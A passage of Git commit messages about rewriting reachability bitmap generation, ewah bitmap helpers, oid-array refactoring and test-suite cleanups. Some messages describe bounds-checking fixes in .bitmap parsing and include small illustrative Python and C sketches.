which are custom helpers for this function) to check sizes before
advancing the pointers.
- Adding more tests in this area. Testing these truncation situations
is remarkably fragile to even subtle changes in the bitmap
generation. So, the resulting tests are likely to be quite brittle.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The bitmap_builder_init() method walks the reachable commits in
topological order and constructs a "reverse graph" along the way. At the
moment, this reverse graph contains an edge from commit A to commit B if
and only if A is a parent of B. Thus, the name "children" is appropriate
for this reverse graph.
In the next change, we will repurpose the reverse graph to not be
directly-adjacent commits in the commit-graph, but instead a more
abstract relationship. The previous changes have already incorporated
the necessary updates to fill_bitmap_commit() that allow these edges to
not be immediate children.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The current rev-list tests that check the bitmap data only work on HEAD
instead of multiple branches. Expand the test cases to handle both
'master' and 'other' branches.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Helped-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
It can be helpful to check if a commit_list contains a commit. Use
pointer equality, assuming lookup_commit() was used.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The bitmap_is_subset() function checks if the 'self' bitmap contains any
bits that are not on in the 'other' bitmap. Up until this patch, it
had a declaration, but no implementation or callers. A subsequent patch
will want this function, so implement it here.
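To make the described check concrete, here is a small Python sketch over
bitmaps stored as lists of integer words. The name has_bits_outside() is
hypothetical and chosen to describe the result; it is not the C function
itself, only the same test as stated above.

```python
def has_bits_outside(self_words, other_words):
    """Return True if 'self' has any bit set that is not set in 'other'."""
    common = min(len(self_words), len(other_words))
    for i in range(common):
        if self_words[i] & ~other_words[i]:
            return True
    # Words that exist only in 'self' count if any of their bits are set.
    return any(self_words[common:])
```

The two bitmaps may have different lengths, so the tail of the longer
'self' has to be examined separately; a longer 'other' can be ignored.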
Helped-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The current implementation of bitmap_writer_build() creates a
reachability bitmap for every walked commit. After computing a bitmap
for a commit, those bits are pushed to an in-progress bitmap for its
children.
fill_bitmap_commit() assumes the bits corresponding to objects
reachable from the parents of a commit are already set. This means that
when visiting a new commit, we only have to walk the objects reachable
between it and any of its parents.
A future change to bitmap_writer_build() will relax this condition so
not all parents have their bits set. Prepare for that by having
'fill_bitmap_commit()' walk parents until reaching commits whose bits
are already set. Then, walk the trees for these commits as well.
This has no functional change with the current implementation of
bitmap_writer_build().
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Our algorithm to generate reachability bitmaps walks through the commit
graph from the bottom up, passing bitmap data from each commit to its
descendants. For a linear stretch of history like:
A -- B -- C
our sequence of steps is:
- compute the bitmap for A by walking its trees, etc
- duplicate A's bitmap as a starting point for B; we can now free A's
bitmap, since we only needed it as an intermediate result
- OR in any extra objects that B can reach into its bitmap
- duplicate B's bitmap as a starting point for C; likewise, free B's
bitmap
- OR in objects for C, and so on...
Rather than duplicating bitmaps and immediately freeing the original, we
can just pass ownership from commit to commit. Note that this doesn't
always work:
- the recipient may be a merge which already has an intermediate
bitmap from its other ancestor. In that case we have to OR our
result into it. Note that the first ancestor to reach the merge does
get to pass ownership, though.
- we may have multiple children; we can only pass ownership to one of
them
However, it happens often enough and copying bitmaps is expensive enough
that this provides a noticeable speedup. On a clone of linux.git, this
reduces the time to generate bitmaps from 205s to 70s. This is about the
same amount of time it took to generate bitmaps using our old "many
traversals" algorithm (the previous commit measures the identical
scenario as taking 63s). It unfortunately provides only a very modest
reduction in the peak memory usage, though.
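The hand-off can be sketched in Python roughly as follows, using sets in
place of bitmaps. The function name and the 'in_progress' dictionary are
assumptions made for this illustration; the return value counts how many
copies were still needed.

```python
def push_to_children(bitmap, children, in_progress):
    """Pass a finished bitmap to each child, copying only when necessary."""
    copies = 0
    handed_off = False
    for child in children:
        if child in in_progress:
            # A merge that already has an intermediate bitmap: OR into it.
            in_progress[child] |= bitmap
        elif not handed_off:
            # The first child without a bitmap takes ownership, no copy.
            in_progress[child] = bitmap
            handed_off = True
        else:
            # Any further children need their own duplicate.
            in_progress[child] = set(bitmap)
            copies += 1
    return copies
```

On a linear stretch of history every commit has a single child, so the
sketch never copies at all.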
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The bitmap generation code works by iterating over the set of commits
for which we plan to write bitmaps, and then for each one performing a
traditional traversal over the reachable commits and trees, filling in
the bitmap. Between two traversals, we can often reuse the previous
bitmap result as long as the first commit is an ancestor of the second.
However, our worst case is that we may end up doing "n" complete
traversals to the root in order to create "n" bitmaps.
In a real-world case (the shared-storage repo consisting of all GitHub
forks of chromium/chromium), we perform very poorly: generating bitmaps
takes ~3 hours, whereas we can walk the whole object graph in ~3
minutes.
This commit completely rewrites the algorithm, with the goal of
accessing each object only once. It works roughly like this:
- generate a list of commits in topo-order using a single traversal
- invert the edges of the graph (so have parents point at their
children)
- make one pass in reverse topo-order, generating a bitmap for each
commit and passing the result along to child nodes
We generate correct results because each node we visit has already had
all of its ancestors added to the bitmap. And we make only two linear
passes over the commits.
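A minimal Python sketch of these three steps, using sets in place of
bitmaps, might look like the following. The function and argument names
are assumptions for illustration, and 'new_objects' stands in for
whatever trees and blobs would be found by walking each commit.

```python
def build_bitmaps(parents, new_objects, topo_order):
    """Return the set of reachable items for every commit in topo_order."""
    # Invert the edges so that each parent points at its children.
    children = {commit: [] for commit in topo_order}
    for commit in topo_order:
        for parent in parents[commit]:
            children[parent].append(commit)

    in_progress = {}  # partial results for commits not yet visited
    finished = {}
    # topo_order lists children before parents, so the reversed order
    # visits every ancestor before its descendants.
    for commit in reversed(topo_order):
        bitmap = in_progress.pop(commit, set())
        bitmap.add(commit)
        bitmap |= new_objects[commit]
        finished[commit] = frozenset(bitmap)
        # Pass the result along to the child nodes.
        for child in children[commit]:
            in_progress.setdefault(child, set()).update(bitmap)
    return finished
```

Each commit is handled once in each pass, which is where the "two linear
passes" come from; the copying into every child is what the memory
concerns further down are about.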
We also visit each tree usually only once. When filling in a bitmap, we
don't bother to recurse into trees whose bit is already set in the
bitmap (since we know we've already done so when setting their bit).
That means that if commit A references tree T, none of its descendants
will need to open T again. I say "usually", though, because it is
possible for a given tree to be mentioned in unrelated parts of history
(e.g., cherry-picking to a parallel branch).
So we've accomplished our goal, and the resulting algorithm is pretty
simple to understand. But there are some downsides, at least with this
initial implementation:
- we no longer reuse the results of any on-disk bitmaps when
generating. So we'd expect to sometimes be slower than the original
when bitmaps already exist. However, this is something we'll be able
to add back in later.
- we use much more memory. Instead of keeping one bitmap in memory at
a time, we're passing them up through the graph. So our memory use
should scale with the graph width (times the size of a bitmap).
So how does it perform?
For a clone of linux.git, generating bitmaps from scratch with the old
algorithm took 63s. Using this algorithm it takes 205s. Which is much
worse, but _might_ be acceptable if it behaved linearly as the size
grew. It also increases peak heap usage by ~1G. That's not impossibly
large, but not encouraging.
On the complete fork-network of torvalds/linux, it increases the peak
RAM usage by 40GB. Yikes. (I forgot to record the time it took, but the
memory usage was too much to consider this reasonable anyway).
On the complete fork-network of chromium/chromium, I ran out of memory
before succeeding. Some back-of-the-envelope calculations indicate it
would need 80+GB to complete.
So at this stage, we've managed to make things much worse. But because
of the way this new algorithm is structured, there are a lot of
opportunities for optimization on top. We'll start implementing those in
the follow-on patches.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
There's no easy way to make a copy of a bitmap. Obviously a caller can
iterate over the bits and set them one by one in a new bitmap, but we
can go much faster by copying whole words with memcpy().
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We have a function to bitwise-OR an ewah into an uncompressed bitmap,
but not to OR two uncompressed bitmaps. Let's add it.
Interestingly, we have a public header declaration going back to
e1273106f6 (ewah: compressed bitmap implementation, 2013-11-14), but the
function was never implemented. That was all OK since there were no
users of 'bitmap_or()', but a first caller will be added in a couple of
patches.
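For illustration, OR-ing two uncompressed bitmaps can be sketched in
Python over lists of integer words. This is an assumption-laden model of
the operation, not the C code: the word lists and the in-place growth of
the destination are choices made for this example.

```python
def bitmap_or(self_words, other_words):
    """OR every word of 'other' into 'self', growing 'self' if needed."""
    missing = len(other_words) - len(self_words)
    if missing > 0:
        self_words.extend([0] * missing)
    for i, word in enumerate(other_words):
        self_words[i] |= word
```

The destination has to be grown first, since 'other' may have bits set
beyond the words that 'self' currently holds.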
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
If you ask to set a bit in the Nth word and we haven't yet allocated
that many slots in our array, we'll increase the bitmap size to 2*N.
This means we might frequently end up with bitmaps that are twice the
necessary size (as soon as you ask for the biggest bit, we'll size up to
twice that).
But if we just allocate as many words as were asked for, we may not grow
fast enough. The worst case there is setting bit 0, then 1, etc. Each
time we grow we'd just extend by one more word, giving us linear
reallocations (and quadratic memory copies).
A middle ground is relying on alloc_nr(), which causes us to grow by a
factor of roughly 3/2 instead of 2. That's less aggressive than
doubling, and it may help avoid fragmenting memory. (If we start with N,
then grow twice, our total is N*(3/2)^2 = 9N/4. After growing twice,
that array of size 9N/4 can fit into the space vacated by the original
array and first growth, N+3N/2 = 10N/4 > 9N/4, leading to less
fragmentation in memory).
Our worst case is still 3/2N wasted bits (you set bit N-1, then setting
bit N causes us to grow by 3/2), but our average should be much better.
This isn't usually that big a deal, but it will matter as we shift the
reachability bitmap generation code to store more bitmaps in memory.
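The trade-off between the three growth policies can be explored with a
small Python simulation. The alloc_nr() helper mirrors the macro's
formula, (x + 16) * 3 / 2 with integer division; the simulate() function
and the STRATEGIES table are hypothetical names for this sketch, which
models the worst case above of touching one more word each time.

```python
def alloc_nr(alloc):
    # Same formula as the alloc_nr() macro, with integer division.
    return (alloc + 16) * 3 // 2


def simulate(num_words, grow):
    """Touch words 1..num_words in order; return (reallocations, final size)."""
    alloc = 0
    reallocs = 0
    for needed in range(1, num_words + 1):
        if needed > alloc:
            alloc = grow(alloc, needed)
            reallocs += 1
    return reallocs, alloc


STRATEGIES = {
    # Allocate exactly what was asked for.
    "exact": lambda alloc, needed: needed,
    # Allocate twice what was asked for.
    "double": lambda alloc, needed: 2 * needed,
    # Grow by roughly 3/2, but never below what was asked for.
    "alloc_nr": lambda alloc, needed: max(alloc_nr(alloc), needed),
}
```

Running simulate(1000, ...) with each strategy shows the linear number of
reallocations for "exact" against a handful for the other two; the final
allocation sizes show how much slack each policy leaves.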
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We auto-grow bitmaps when somebody asks to set a bit whose position is
outside of our currently allocated range. Other operations besides
single bit-setting might need to do this, too, so let's pull it into its
own function.
Note that we change the semantics a little: you now ask for the number
of words you'd like to have, not the id of the block you'd like to write
to.
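The change in semantics is easy to get wrong by one, so here is a short
Python sketch of a bit setter built on a grow helper that takes a word
count. The 64-bit word size and both function bodies are assumptions for
illustration, modeled on lists of integers.

```python
BITS_IN_WORD = 64  # assumed word width for this sketch


def bitmap_grow(words, word_count):
    """Make sure 'words' holds at least word_count words."""
    if word_count > len(words):
        words.extend([0] * (word_count - len(words)))


def bitmap_set(words, pos):
    block = pos // BITS_IN_WORD
    # The helper wants a count of words, so writing to block N needs N + 1.
    bitmap_grow(words, block + 1)
    words[block] |= 1 << (pos % BITS_IN_WORD)
```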
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
You can use "git rev-list --test-bitmap HEAD" to check that bitmaps
produce the same answer we'd get from a regular traversal. But if we
detect an error, we only print "mismatch", and still exit with a
successful exit code.
That makes the uses of --test-bitmap in the test suite (e.g., in t5310)
mostly pointless: even if we saw an error, the tests wouldn't notice.
Let's instead call die(), which will let these tests work as designed,
and alert us if the bitmaps are bogus.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We truncate the .bitmap file to 512 bytes and expect to run into
problems reading an individual ewah file. But this length is somewhat
arbitrary, and just happened to work when the test was added in
9d2e330b17 (ewah_read_mmap: bounds-check mmap reads, 2018-06-14).
An upcoming commit will change the size of the history we create in the
test repo, which will cause this test to fail. We can future-proof it a
bit more by reducing the size of the truncated bitmap file.
Signed-off-by: Jeff King <peff@peff.net>
Helped-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
A .bitmap file may have a "name hash cache" extension, which puts a
sequence of uint32_t values (one per object) at the end of the file.
When we see a flag indicating this extension, we blindly subtract the
appropriate number of bytes from our available length. However, if the
.bitmap file is too short, we'll underflow our length variable and wrap
around, thinking we have a very large length. This can lead to reading
out-of-bounds bytes while loading individual ewah bitmaps.
We can fix this by checking the number of available bytes when we parse
the header. The existing "truncated bitmap" test is now split into two
tests: one where we don't have this extension at all (and hence actually
do try to read a truncated ewah bitmap) and one where we realize
up-front that we can't even fit in the cache structure. We'll check
stderr in each case to make sure we hit the error we're expecting.
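The wrap-around is easy to reproduce in a Python sketch that emulates
unsigned arithmetic with a mask. The 64-bit width, the function names,
and the error message are assumptions for illustration; the cache size
follows the description above of one uint32_t per object.

```python
SIZE_MASK = (1 << 64) - 1  # emulate a 64-bit unsigned length


def remaining_unchecked(available, num_objects):
    """Blindly subtract the cache size, wrapping like unsigned math does."""
    return (available - 4 * num_objects) & SIZE_MASK


def remaining_checked(available, num_objects):
    """Refuse files that are too short to hold the cache at all."""
    cache_size = 4 * num_objects
    if cache_size > available:
        raise ValueError("bitmap file too short for name-hash cache")
    return available - cache_size
```

With 100 bytes available and 1000 objects, the unchecked version reports
an enormous remaining length instead of a negative one, which is what
lets later reads run out of bounds.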
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When we parse a .bitmap header, we first check that we have enough bytes
to make a valid header. We do that based on sizeof(struct
bitmap_disk_header). However, as of 0f4d6cada8 (pack-bitmap: make bitmap
header handling hash agnostic, 2019-02-19), that struct oversizes its
checksum member to GIT_MAX_RAWSZ. That means we need to adjust for the
difference between that constant and the size of the actual hash we're
using. That commit adjusted the code which moves our pointer forward,
but forgot to update the size check.
This meant we were overly strict about the header size (requiring room
for a 32-byte worst-case hash, when sha1 is only 20 bytes). But in
practice it didn't matter because bitmap files tend to have at least 12
bytes of actual data anyway, so it was unlikely for a valid file to be
caught by this.
Let's fix it by pulling the header size into a separate variable and
using it in both spots. That fixes the bug and simplifies the code to make
it harder to have a mismatch like this in the future. It will also come
in handy in the next patch for more bounds checking.
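
The idea can be sketched roughly as follows. The struct layout, the
MAX_RAWSZ stand-in for GIT_MAX_RAWSZ, and both function names are
assumptions made for illustration; only the "compute the size once, use
it in both spots" shape is taken from the description above:

```c
#include <stddef.h>
#include <stdint.h>

#define MAX_RAWSZ 32 /* stand-in for GIT_MAX_RAWSZ (worst-case hash size) */

/* Illustrative layout only; the real on-disk header struct may differ. */
struct disk_header {
	char magic[4];
	uint16_t version;
	uint16_t options;
	uint32_t entry_count;
	unsigned char checksum[MAX_RAWSZ]; /* oversized to the largest hash */
};

/* On-disk header length for a hash of rawsz bytes (20 for SHA-1). */
size_t header_size(size_t rawsz)
{
	return sizeof(struct disk_header) - MAX_RAWSZ + rawsz;
}

/* Use the same computed size for the bounds check and the pointer advance. */
int parse_header(size_t file_len, size_t rawsz, size_t *pos)
{
	size_t size = header_size(rawsz);

	if (file_len < size)
		return -1; /* too short to hold a header for this hash */
	*pos += size;
	return 0;
}
```

With a single variable there is no second expression that can drift out
of sync when the hash size changes.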
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
'ewah/ewah_bitmap.c:buffer_grow()' is responsible for growing the buffer
used to store the bits of an EWAH bitmap. It is essentially doing the
same task as the 'ALLOC_GROW()' macro, so use that instead.
This simplifies the callers of 'buffer_grow()', who no longer have to
ask for a specific size, but rather specify how much of the buffer they
need. They also no longer need to guard 'buffer_grow()' behind an if
statement, since 'ALLOC_GROW()' (and, by extension, 'buffer_grow()') is
a noop if the buffer is already large enough.
But the most significant change is that this fixes a bug when calling
'buffer_grow()' with both 'alloc_size' and 'new_size' set to 1. In this
case, truncating integer math will leave the new size set to 1, causing
the buffer to never grow.
Instead, let alloc_nr() handle this, which asks for '(new_size + 16) * 3
/ 2' instead of 'new_size * 3 / 2'.
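
The arithmetic can be checked with a small sketch. The two function
names below are made up for illustration; the formulas are the two
quoted above:

```c
#include <stddef.h>

/* The 'new_size * 3 / 2' rule: integer division truncates 3/2 to 1. */
size_t grow_naive(size_t n)
{
	return n * 3 / 2;
}

/* The '(new_size + 16) * 3 / 2' rule attributed to alloc_nr() above. */
size_t grow_alloc_nr(size_t n)
{
	return (n + 16) * 3 / 2;
}
```

For n = 1 the first rule yields 1 (no growth at all), while the second
yields 25.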
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
To allow us to consider a change in the default behavior of `git init`
where it uses a more inclusive name for the initial branch, we must
first teach the test suite not to rely on a specific default branch
name. In this patch, we teach t7064 that trick.
To that end, we set a specific name for the initial branch. Ideally, we
would simply start out by calling `git branch -M initial-branch`, but
there is a bug in `git branch -M` that does not allow renaming branches
unless they already have commits. This will be fixed in the
`js/init-defaultbranch-advice` topic, and until that time, we use the
equivalent (but less intuitive) `git checkout -f --orphan`.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Git diff reports a submodule directory as -dirty even when there are
only untracked files in the submodule directory. This is inconsistent
with what `git describe --dirty` says when run in the submodule
directory in that state.
Make `--ignore-submodules=untracked` the default for `git diff` when
there is no configuration variable or command line option, so that the
command would not give '-dirty' suffix to a submodule whose working
tree has untracked files, to make it consistent with `git
describe --dirty` that is run in the submodule working tree.
And also make `--ignore-submodules=none` the default for `git status`
so that the user doesn't end up deleting a submodule that has
uncommitted (untracked) files.
Signed-off-by: Sangeeta Jain <sangunb09@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
A long time ago, when the __git_complete helper was introduced, _gitk was
replaced with __gitk_main, and a placeholder for backwards compatibility
pointing to __git_wrap__gitk_main was left in place.
When "__git_complete gitk __gitk_main" was called, that created the
__git_wrap__gitk_main helper, which is just basically "__git_func_wrap
__gitk_main" plus `complete` options.
Unfortunately the commit b0a4b2d257 (completion: add support for
backwards compatibility, 2012-05-19) missed a previous instance of a
call to _gitk in _git_gitk.
So, basically we had __git_wrap__git_main -> __git_func_wrap __git_main ->
__git_complete_command gitk -> _git_gitk -> _gitk ->
__git_wrap__gitk_main -> __git_func_wrap __gitk_main -> __gitk_main.
There was never any need to call __git_func_wrap twice. Since _git_gitk
is always called inside the wrapper, it can call __gitk_main directly.
And then, in commit 441ecdab37 (completion: bash: remove old compat
wrappers, 2020-10-27) _gitk was removed, which triggers the following
error:
_git_gitk:9: command not found: _gitk
Let's call the correct function: __gitk_main.
Cc: SZEDER Gábor <szeder.dev@gmail.com>
Signed-off-by: Felipe Contreras <felipe.contreras@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Our packed_commit_list is an array of pointers to commit structs. We use
"int" for the allocation, which is 32-bit even on 64-bit platforms. This
isn't likely to overflow in practice (we're writing commit graphs, so
you'd need to actually have billions of unique commits in the
repository). But it's good practice to use size_t for allocations.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Our custom packed_oid_list data structure is really just an oid_array in
disguise. Let's switch to using the generic structure, which shortens
and simplifies the code slightly.
There's one slightly awkward part: in the old code we copied a hash
straight from the mmap'd on-disk data into the final object_id. And now
we'll copy to a temporary oid, which we'll then pass to
oid_array_append(). But this is an operation we have to do all over the
commit-graph code already, since it mostly uses object_id structs
internally. I also measured "git commit-graph --append", which triggers
this code path, and it showed no difference.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When writing a commit graph, we collect a list of object ids in an
array, which we'll eventually copy into an array of "struct commit"
pointers. Before we do that, though, we count the number of distinct
commit entries. There's a subtle bug in this step, though.
We eliminate not only duplicate oids but also, in split mode, any oids
which are not commits or which are already in a graph file. However, the
loop starts at index 1, always counting index 0 as distinct. And indeed
it can't be a duplicate, since we check for those by comparing against
the previous entry, and there isn't one for index 0. But it could be a
commit that's already in a graph file, and we'd overcount the number of
commits by 1 in that case.
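
To make the off-by-one concrete, here is a sketch of the loop shape
described above next to a variant that filters index 0 as well. The
struct and both function names are hypothetical, and a single in_graph
flag stands in for the "not a commit or already in a graph file" test:

```c
#include <stddef.h>

/* Hypothetical entry: a sorted id plus a flag for "already in a graph file". */
struct entry {
	int id;
	int in_graph;
};

/* Loop starts at index 1, so index 0 is counted without being filtered. */
size_t count_distinct_buggy(const struct entry *e, size_t nr)
{
	size_t i, count = nr ? 1 : 0;

	for (i = 1; i < nr; i++) {
		if (e[i].id == e[i - 1].id)
			continue; /* duplicate of the previous entry */
		if (e[i].in_graph)
			continue; /* filtered out */
		count++;
	}
	return count;
}

/* Applies the filter to every index, including 0. */
size_t count_distinct(const struct entry *e, size_t nr)
{
	size_t i, count = 0;

	for (i = 0; i < nr; i++) {
		if (i && e[i].id == e[i - 1].id)
			continue;
		if (e[i].in_graph)
			continue;
		count++;
	}
	return count;
}
```

When the first entry is already in a graph file, the first function
reports one more than the second.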
That turns out not to be a problem, though. The only things we do with
the count are:
- check if our count will overflow our data structures. But the limit
there is 2^31 commits, so while this is a useful check, the
off-by-one is not likely to matter.
- pre-allocate the array of commit pointers. But over-allocating by
one isn't a problem; we'll just waste a few extra bytes.
The bug would be easy enough to fix, but we can observe that neither of
those steps is necessary.
After building the actual commit array, we'll likewise check its count
for overflow. So the extra check of the distinct commit count here is
redundant.
And likewise we use ALLOC_GROW() when building the commit array, so
there's no need to preallocate it (it's possible that doing so is
slightly more efficient, but if we care we can just optimistically
allocate one slot for each oid; I didn't bother here).
So count_distinct_commits() isn't doing anything useful. Let's just get
rid of that step.
Note that a side effect of the function was that we sorted the list of
oids, which we do rely on in copy_oids_to_commits(), since it must also
skip the duplicates. So we'll move the qsort there. I didn't copy the
"TODO" about adding more progress meters. It's actually quite hard to
make a repository large enough that this qsort would take an appreciable
amount of time, so this doesn't seem like a useful note.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We provide oid_array_for_each_unique() for iterating over the
de-duplicated items in an array. But it's awkward to use for two
reasons:
1. It uses a callback, which means marshaling arguments into a struct
and passing it to the callback with a void parameter.
2. The callback doesn't know the numeric index of the oid we're
looking at. This is useful for things like progress meters.
Iterating with a for-loop is much more natural for some cases, but the
caller has to do the de-duping itself. However, we can provide a small
helper to make this easier (see the docstring in the header for an
example use).
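
As a rough illustration of the for-loop style (this is an analogue over
a sorted array of ints, with hypothetical names, not the helper added
to oid-array.h):

```c
#include <stddef.h>

/*
 * Hypothetical analogue of the helper, over sorted ints instead of
 * object ids: given index i, return the index of the first later
 * element that differs from vals[i] (or nr if there is none).
 */
size_t next_unique(const int *vals, size_t nr, size_t i)
{
	size_t j = i + 1;

	while (j < nr && vals[j] == vals[i])
		j++;
	return j;
}

/* Count distinct values with a plain for-loop; vals must be sorted. */
size_t count_unique(const int *vals, size_t nr)
{
	size_t i, count = 0;

	for (i = 0; i < nr; i = next_unique(vals, nr, i))
		count++; /* i is the numeric index, e.g. for a progress meter */
	return count;
}
```

The loop body sees the index directly and needs no callback struct,
which addresses both of the points listed above.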
The caller does have to remember to sort the array first. We could add
an assertion into the helper that array->sorted is set, but I didn't
want to complicate what is otherwise a pretty fast code path.
I also considered adding a full iterator type with init/next/end
functions (similar to what we have for hashmaps). But it ended up making
the callers much harder to read. This version keeps us close to a basic
for-loop.
Yet another option would be adding an option to sort the array and
compact out the duplicates. This would mean iterating over the array an
extra time, though that's probably not a big deal (we did just do an
O(n log n) sort). But we'd still have to write a for-loop to iterate, so
it doesn't really make anything easier for the caller.
No new test, since we'll convert the callback iterator (which is covered
by t0064, among other callers) to use the new code.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Our test suite currently only passes when `git init` uses the name
`master` for the initial branch. This would stop us from changing the
default branch name.
Let's adjust t6300 so that it does not rely on any specific default
branch name. This trick is done by (force-)renaming the initial branch
to the name `main` in the `setup` and the `:remotename and :remoteref`
test cases, and then replacing all mentions of `master` and `MASTER`
with `main` and `MAIN`, respectively.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Split a very long line in a test introduced in 0b691d8685 (pretty:
add support for separator option in %(trailers), 2019-01-28). This
makes it easier to read, especially as follow-up commits will copy
this test as a template.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We sort the oid-array as a side effect of calling the lookup or
unique-iteration functions. But callers may want to sort it themselves
(especially as we add new iteration options in future patches).
We'll also move the check of the "sorted" flag into the sort function,
so callers don't have to remember to check it.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We define git_hash_algo and object_id in hash.h, but most of the utility
functions are declared in the main cache.h. Let's move them to hash.h
along with their struct definitions. This cleans up cache.h a bit, but
also avoids circular dependencies when other headers need to know about
these functions (e.g., if oid-array.h were to have an inline that used
oideq(), it couldn't include cache.h because it is itself included by
cache.h).
No including C files should be affected, because hash.h is always
included in cache.h already.
We do have to mention repository.h at the top of hash.h, though, since
we depend on the_repository in some of our inline functions.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Our tests for handling duplicates in oid-array provide only a single
duplicate for each number, so our sorted array looks like:
44 44 55 55 88 88 aa aa
A slightly more interesting test is to have multiple duplicates, which
makes sure that we not only skip the duplicate, but keep skipping until
we are out of the set of matching duplicates.
Unsurprisingly this works just fine, but it's worth beefing up this test
since we're about to change the duplicate-detection code.
Note that we do need to adjust the results on the lookup test, since it
is returning the index of the found item (and now we have more items
before our range, and the range itself is slightly larger, since we'll
accept a match of any element).
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The data type is an oid_array these days, and we are using "test-tool
oid-array", so let's name the test script appropriately.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When this file was moved from sha1-array.h, we forgot to update the
preprocessor header guard to match the new name.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In 0a21d0e089 (Makefile: mark git-maintenance as a builtin,
2020-12-01), we marked git-maintenance as a builtin in the Makefile, but
forgot to do the same in `CMakeLists.txt`.
Rather than always play catch-up and adjust `git_builtin_extra`
manually, use the `BUILT_INS` definitions in the Makefile as
authoritative source and generate `git_builtin_extra` dynamically.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Initially, we started converting this test script in anticipation of
renaming the default branch name to `main`. To that end, we partially
converted it to accommodate that default branch name, marking the
now-failing test cases with a prereq that was designed to be fulfilled
once the rename was complete.
However, the effort to move to the branch name `main` needs quite a bit
longer, as it was decided that we need a deprecation phase first.
To avoid keeping t5526 in limbo for such a long time, we just made it
independent of the actual default branch name used by Git. Therefore,
that prereq is no longer necessary, and we can drop it.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
While at it, use different default branch names for the three different
repositories involved in the test script: this makes it easier to debug
failures, too (otherwise you have to wonder which `master` branch was
meant: the super project's? The submodule's? The nested submodule's?).
Note: this touches code that was originally modified to prepare for
renaming the default branch name to `main`. This patch side-steps that
effort completely by overriding the initial branch name explicitly.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Something changed in `vcpkg` (which we use in our Visual C++ build to
provide the dependencies such as libcurl) and our `vs-build` job started
failing in CI. The reason is that we had a work-around in place to help
CMake find iconv, and this work-around is neither needed nor does it
work anymore.
For the full discussion with the vcpkg project, see this comment:
https://github.com/microsoft/vcpkg/issues/14780#issuecomment-735368280
Signed-off-by: Dennis Ameling <dennis@dennisameling.com>
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
To keep track of which object filters are allowed or not, 'git
upload-pack' stores the name of each filter in a string_list, and sets
